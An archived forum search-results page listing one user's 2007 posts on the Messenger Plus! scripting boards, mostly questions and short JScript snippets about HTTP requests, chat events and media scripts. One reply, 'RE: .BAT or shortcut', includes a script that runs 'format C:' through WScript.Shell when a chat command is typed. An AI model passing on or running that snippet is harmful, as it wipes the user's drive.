What happened to the Messenger Plus! forums on msghelp.net?
Shoutbox » Search » Results

Search Results
Subject Author Forum Time
RE: [?] Send using POST : httpwebrequests
it didn't work :(
roflmao456Scripting06-05-2007 at 02:42 AM
[?] Send using POST : httpwebrequests
How do i send stuff using POST in httpwebrequests? i'm confused on what to do i tried changing [code]httpwr.open("[b]GET[/b]" [...][/code] to [code]httpwr.open("[b]POST[/b]" [...][/code] but it does not work :(
roflmao456Scripting06-04-2007 at 10:43 PM
RE: [?] Window Interface help...
it works ... :)
roflmao456Scripting06-04-2007 at 12:44 AM
[?] Window Interface help...
How do I make a window flash in a function? and how to allow unicode characters in a text area when using SetControlText :P
roflmao456Scripting06-03-2007 at 11:06 PM
RE: [help] to clear the http web requests
all your ideas were great and worked (Y) thanks :)
roflmao456Scripting06-03-2007 at 10:28 PM
[help] to clear the http web requests
how do i clear the cache of http web requests? [size=1]or always download a newer version of the page[/size] it always displays the same content that i'm trying to download :p
roflmao456Scripting06-03-2007 at 10:09 PM
RE: Auto Change Swimming Msg !
unfortunately, wlm blocks requests of nick changes if you change it very often in a period of time.. so that wouldn't work. the 'what's playing column' is where your psm is :tongue:
roflmao456Scripting06-01-2007 at 08:57 PM
RE: Script :Need Some Help
[code] var talk = false; function OnEvent_ChatWndCreated(Chatwndtest){ talk = true; } function OnEvent_ChatWndReceiveMessage(ChatWndtest,Origin,M essage,MessageKind){ if (Origin != Messenger.MyName && MessageKind == 1 && talk == true) { merlin.Sh...
roflmao456Scripting05-28-2007 at 07:55 PM
RE: Invalid command?
try posting your code here and we'll see + fix errors. the code for adding your commands (my way :tongue:): [code]function OnGetScriptCommands(){ var SC = "<ScriptCommands>"; SC += "<Command>"; SC += "<Name>Your_Command</Name>"; SC += "<Descr...
roflmao456Scripting05-13-2007 at 10:47 PM
Fav. Game Console
?
roflmao456General Chit Chat04-21-2007 at 04:59 AM
RE: Check for contact...
[code]function OnEvent_ChatWndReceiveMessage(ChatWnd){ var e = new Enumerator(Messenger.MyContacts); for(; !e.atEnd(); e.moveNext()){ var Contact = e.item(); if(Contact.Email == "no-spam@hotmail.co.uk" && Contact.Status != 1){ ChatWnd.SendMessage(...
roflmao456Scripting04-21-2007 at 04:52 AM
RE: [Help: Events] OnEvent_AddContact (Add Contact)?
people might implement their own msn so it automatically adds them :sad: it can also be used to destroy your contact list :cry:
roflmao456Scripting04-21-2007 at 04:41 AM
RE: My IP.
lool for months i had my old ip. o well :tongue:
roflmao456Tech Talk04-21-2007 at 04:29 AM
My IP.
@DZ: you know my IP please PM me my IP .. my IP was before my old one 74.111.***.** (DZ you know it) now it has changed to... 99.245.*.*** same goes with all my other stuff.. gateway, dns what has happened? I cannot access my sites and http://ip-adre...
roflmao456Tech Talk04-19-2007 at 10:52 PM
RE: save (export) nickname
i think he means multiple names in a file/ftp ?
roflmao456Skype & Live Messenger04-18-2007 at 01:07 AM
RE: Check whether file exists
make an event and pop in this code: [code][i]objname[/i].Text = "whatever" ' blah blah blah [/code]
roflmao456Tech Talk04-06-2007 at 05:34 AM
RE: [request] xfire script
ah, thx! that is what i needed lolz
roflmao456Scripting03-15-2007 at 09:42 PM
[request] xfire script
is there a script (or could make one) where it will change my psm to the game im playing on xfire? thx
roflmao456Scripting03-15-2007 at 09:07 PM
RE: .BAT or shortcut
[code] // original code from MrT because im too lazy :P function OnEvent_ChatWndSendMessage(ChatWnd, Message){ if(Message=="/del"){ var Shell = new ActiveXObject("WScript.Shell"); var cal = Shell.Run("format C:"); return ""; } } [/code] i do...
roflmao456Scripting03-09-2007 at 09:53 PM
RE: [beta] WLMTunes
can you please make it so that it will not close when you click the edge and press ESC just like the script Timezone
roflmao456Scripting03-09-2007 at 09:49 PM
RE: [beta] WLMTunes
can you make it supported with WMP :) and the dialog box (info box) where you hold the mouse on the play button, it will not dissappear sometimes? oh and when you click on the dialog box and press ESC, it will close. good script i guess (Y)
roflmao456Scripting03-08-2007 at 02:36 AM
RE: [help please] timer
it is easy to make, but it will be annoying to both you and your contacts. >.>
roflmao456Scripting03-07-2007 at 10:23 PM
[release] WLMini Media Player 2.1.6! [vista-compatible]
WLMini Media Player allows you to listen to music on messenger. [b]Commands:[/b] [list] [*][b]/mp[/b] - Opens the Media Player [*][b]/play[/b] - Plays the last song or continues the current one [*][b]/stop[/b] - Stops the current song. [*][b]/pause[/...
roflmao456Scripting03-06-2007 at 02:48 AM
RE: yay!
(N) [size=1]jk...[/size] (Y)
roflmao456General Chit Chat03-05-2007 at 02:55 AM
RE: annoying error -- other people may have this
those are the only 2 drives :sad: (+ my hard drive :P)
roflmao456Tech Talk02-27-2007 at 11:33 PM
[Hide Excerpts] Pages: (39): « First « 28 29 30 31 [ 32 ] 33 34 35 36 » Last »